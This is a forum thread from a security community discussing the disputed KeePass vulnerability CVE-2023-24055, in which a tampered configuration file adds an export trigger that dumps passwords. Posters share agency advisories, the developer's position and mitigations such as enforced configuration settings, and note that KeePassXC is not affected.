NCSC warns of Vulnerability in Password Manager KeePass

Gandalf_The_Grey

Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
6,506
Dutch article translated by DeepL:
The Ministry of Justice and Security's National Cyber Security Center (NCSC) is warning of a vulnerability in password manager KeePass that would allow an attacker who already has access to a system to obtain data in the KeePass database, such as passwords. The developer states that this is not a vulnerability and KeePass' password database is not designed to protect against an attacker with such access to the system. Accordingly, no security update will be released.

A proof-of-concept exploit that allows a local attacker to obtain the contents of the KeePass database has appeared online. The security flaw is caused by KeePass' configuration being stored unencrypted. A local attacker can modify this configuration and add a rogue export rule. When a user opens a KeePass database, the export rule causes stored data to be exported to the attacker undetected.

According to the NCSC, system administrators can still prevent abuse through an Enforced Configuration. "Setting the ExportNoKey parameter to false ensures that a master password is required for exporting stored data. This prevents a malicious party from surreptitiously exporting sensitive data," the NCSC said.

The government agency advises organizations to use an Enforced Configuration and implement at least the above configuration. In addition, organizations are advised to perform risk assessment before using KeePass. The vulnerability in KeePass is designated as CVE-2023-24055, but has been disputed by the developer.
 

Azure

Level 28
Verified
Top Poster
Content Creator
Oct 23, 2014
1,712
That has been something I have been wondering about since quite some people have decided to quit using cloud password manager. Couldn’t a hacker just target their local password manager.

And sure this article states that this vulnerability requires a local hacker. But isn’t that how a lot of things start? With small often overlook steps.
Who to say what will happen in a couple of months and if that might no longer be a requirement.
 

ScandinavianFish

Level 7
Verified
Dec 12, 2021
317
When LastPass was hacked, people were suggesting not to go for Cloud Password Manager like Bitwarden but to use most secured Offline Password Manager like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:
a.jpg
 
Last edited by a moderator:

WhiteMouse

Level 5
Verified
Well-known
Apr 19, 2017
234
When LastPass was hacked, people were suggesting not to go for Cloud Password Manager like Bitwarden but to use most secured Offline Password Manager like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:
430473094732094.jpg


Joke aside, I don't care about product X has a vulnerability, it happens to every software. The only thing that important is how the company deals with it.
 

Azure

Level 28
Verified
Top Poster
Content Creator
Oct 23, 2014
1,712
When LastPass was hacked, people were suggesting not to go for Cloud Password Manager like Bitwarden but to use most secured Offline Password Manager like KeePass. Even KeePass is vulnerable, so what do we do now? :unsure:
For Keepass what the articles says seem like an option

According to the NCSC, system administrators can still prevent abuse through an Enforced Configuration. "Setting the ExportNoKey parameter to false ensures that a master password is required for exporting stored data. This prevents a malicious party from surreptitiously exporting sensitive data," the NCSC said.

For Bitwarden, make sure you have a strong master password
 

Andrezj

Level 6
Nov 21, 2022
248
this method does not require physical access
by "access" they mean the attacker has gained network access to the system, such as a remote agent running on the system or a local attacker who has gained access remotely while being behind the router on the LAN
now threat actors can programmatically perform the attack, incorporate it into a infostealer that will send the password export file to a remote destination

the "poc" was done by a local hacker but that does not preclude the same poc performed by a remote attacker

the notification is not accurately written, all an attacker needs is write access to the keepass configuration file - that can be any attacker with the required permssions - local or remote

Untitled.png
 

Gandalf_The_Grey

Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
6,506
WARNING - AN ATTACKER WHO HAS WRITE ACCESS TO THE KEEPASS CONFIGURATION FILE CAN MODIFY IT AND INJECT MALICIOUS TRIGGERS

Sources​

Keepass - Security Issues - KeePass

Risks​

An attacker who has write access to the KeePass configuration file can modify it and inject malicious triggers, e.g to obtain the cleartext passwords by adding an export trigger.

Description​

KeePass features an event-condition-action trigger system. With this system workflows can be automated. An attacker could abuse this feature by injecting malicious triggers in the KeePass configuration file.
The Keepass knowledge base article regarding security issues indicates having write access to the KeePass configuration file typically implies that an attacker can actually perform much more powerful attacks than modifying the configuration file (and these attacks in the end can also affect KeePass, independent of a configuration file protection).
These attacks can only be prevented by keeping the environment secure by using an anti-virus software, a firewall, not opening unknown e-mail attachments, etc. Therefore, no patch will be provided.
Other projects supporting KeePass databases such as KeePassXC do not share code with KeePass. In addition, these do not implement a trigger system and are by consequence not vulnerable to this attack vector.

Recommended Actions​

Since no patch will be made available, the CCB suggests to implement a mitigation via the enforced configuration feature. This feature is intended primarily for network administrators who want to enforce certain settings for users of a KeePass installation but can also be used by end users to harden their KeePass setup. Please take note this hardening only makes sense if this file can not be modified by the end user.

Settings in the enforced configuration file KeePass.config.enforced.xml take precedence over settings in global and local configuration files. Various options to harden your KeePass setup are documented in the GitHub Keepass-Enhanced-Security-Configuration repository listed in the reference section. It is for example possible to fully disable the trigger feature (XPath Configuration/Application/TriggerSystem).

Organizations might also consider moving to an alternative password manager with support for KeePass password vaults.

References​

Vendor mailing list - KeePass / Discussion / Open Discussion: someone can read the passwords using export trigger

Vendor knowledge base - Enforced Configuration - KeePass

Vulnerability disclosure - GitHub - alt3kx/CVE-2023-24055_PoC: CVE-2023-24055 PoC (KeePass 2.5x)

KeePass hardening guide - GitHub - onSec-fr/Keepass-Enhanced-Security-Configuration: Make your keepass more secure.
 

plat

Level 29
Top Poster
Sep 13, 2018
1,793

If the user has installed KeePass as a regular program and the attackers have write access, they can also "perform various kinds of attacks." Threat actors can also replace the KeePass executable with malware if the user runs the portable version.

"In both cases, having write access to the KeePass configuration file typically implies that an attacker can actually perform much more powerful attacks than modifying the configuration file (and these attacks in the end can also affect KeePass, independent of a configuration file protection)," the KeePass developers explain.

"These attacks can only be prevented by keeping the environment secure (by using an anti-virus software, a firewall, not opening unknown e-mail attachments, etc.). KeePass cannot magically run securely in an insecure environment."

However, even if the KeePass developers will not provide users with a version of the app that addresses the export to cleartext via triggers issue, you could still secure your database by logging in as a system admin and creating an enforced configuration file.
 

Gandalf_The_Grey

Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
6,506
Before using an enforced config file, you must also ensure that regular system users do not have write access to any files/folders in KeePass' app directory.

And there's also one more thing that could allow attackers to work around enforced configurations: using a KeePass executable launched from another folder than the one where your enforced config file was saved.

"Please note that an enforced configuration file only applies to the KeePass program in the same directory," the KeePass development team says,

"If the user runs another copy of KeePass without an enforced configuration file, this copy does not know the enforced configuration file that is stored elsewhere, i.e. no settings are enforced."
 

silversurfer

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,057
I recently switched to KeePass XC what has better support across other OS like Android, iOS, Linux. The self-developed KeePass XC browser extension is another advantage.

This article (posted/shared by @Gandalf_The_Grey) notes that KeePass XC has not the same issues: "not vulnerable to this attack vector."

Edit: Confirmed by a member from developer team of KeePassXC:
KeePassXC is not affected, because it doesn't support triggers.
 
Last edited:

Gandalf_The_Grey

Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
6,506
KeePass Password Manager vulnerability: what you need to know
Closing Words

Keeping a computer system secure is of paramount importance. Attackers who gain access to a system have lots of options at their disposal regarding data theft and other malicious activities. Still, triggers make the exporting of entire password databases simple.
 

Gandalf_The_Grey

Level 76
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
6,506
KeePass 2.53.1 password manager resolves vulnerability controversy
KeePass users may want to upgrade to version 2.53.1 immediately to protect their passwords against automated exports.

Users may also want to check a KeePass security setting to make sure that the database is properly protected against brute force attacks.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top